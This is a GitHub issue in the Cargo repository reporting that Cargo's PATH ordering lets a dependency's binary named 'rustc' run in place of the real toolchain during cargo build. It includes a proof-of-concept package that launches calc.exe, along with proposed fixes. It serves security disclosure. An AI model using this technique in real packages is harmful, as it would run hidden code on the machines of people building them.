Skip to content

Arbitrary code execution during cargo build #13897

New issue
New issue
Open
Open
Arbitrary code execution during cargo build#13897
Labels
A-securityArea: securityC-bugCategory: bugS-triageStatus: This issue is waiting on initial triage.
@LOURC0D3

Description

@LOURC0D3
LOURC0D3
opened on May 10, 2024 ยท edited by LOURC0D3

Problem

When cargo builds a package, it adds the dependency directory to the front of the PATH environment variable.
As a result, the malicious package's modified executable is resolved and executed before toolchain executables such as rustc or cc.
This means that a malicious package may lead to arbitrary code execution.

This appears to be a similar issue to CVE-2024-24787(https://pkg.go.dev/vuln/GO-2024-2825), which was recently discovered in Golang.
However, this bug affects all operating systems, not just Darwin.

Additionally, while CVE-2024-24787 modifies path resolution by directly changing linker flags, Cargo does not require that.

Steps

  1. Configure malicious package.
  • rustc.rs
use std::process::Command;

fn main()
{
	let _test = Command::new("C:\\\\Windows\\\\System32\\\\calc.exe")
		.spawn();
}
  • main.rs
mod rustc;
fn main() {
    println!("Hello, world!");
}
  • Cargo.toml
[package]
name = "poc"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at <https://doc.rust-lang.org/cargo/reference/manifest.html>

[dependencies]
cc = "1.0.94" # for waiting to malicious program

[[bin]]
name = "rustc"
path = "src/rustc.rs"

[[bin]]
name = "test"
path = "src/test.rs"
  1. Result

Running cargo build executes arbitrary code.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2024-05-10 แ„‹แ…ฉแ„Œแ…ฅแ†ซ 11 35 34
poc.mp4

Possible Solution(s)

  • Place the build/deps directory at the end of PATH.
    • The Security team says that break legitimate functionality that expects local libraries to be considered before system libraries. However, it is questionable whether there are cases where local libraries should be considered first.
  • Register a blacklist to prevent building with the executable name of the toolchain used by Rust.

Notes

I reported this bug to the Rust Security Response WG, but it was not treated as a security vulnerability.

Version

release: 1.77.2
commit-hash: e52e360061cacbbeac79f7f1215a7a90b6f08442
commit-date: 2024-03-26
host: x86_64-pc-windows-msvc
libgit2: 1.7.2 (sys:0.18.2 vendored)
libcurl: 8.5.0-DEV (sys:0.4.70+curl-8.5.0 vendored ssl:Schannel)
os: Windows 10.0.22631 (Windows 11 Professional) [64-bit]

Activity

LOURC0D3
added
C-bugCategory: bug
S-triageStatus: This issue is waiting on initial triage.
on May 10, 2024
valadaptive

valadaptive commented on May 10, 2024

@valadaptive
valadaptive
on May 10, 2024
Contributor

It probably was not treated as a vulnerability because Cargo intentionally gives you a way to run arbitrary Rust code at build time via build scripts.

heisen-li

heisen-li commented on May 10, 2024

@heisen-li
heisen-li
on May 10, 2024
Contributor

@rustbot label +A-security

rustbot
added
A-securityArea: security
on May 10, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    A-securityArea: securityC-bugCategory: bugS-triageStatus: This issue is waiting on initial triage.

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

      Participants

      @heisen-li@rustbot@valadaptive@LOURC0D3

      Issue actions
        Arbitrary code execution during `cargo build` ยท Issue #13897 ยท rust-lang/cargo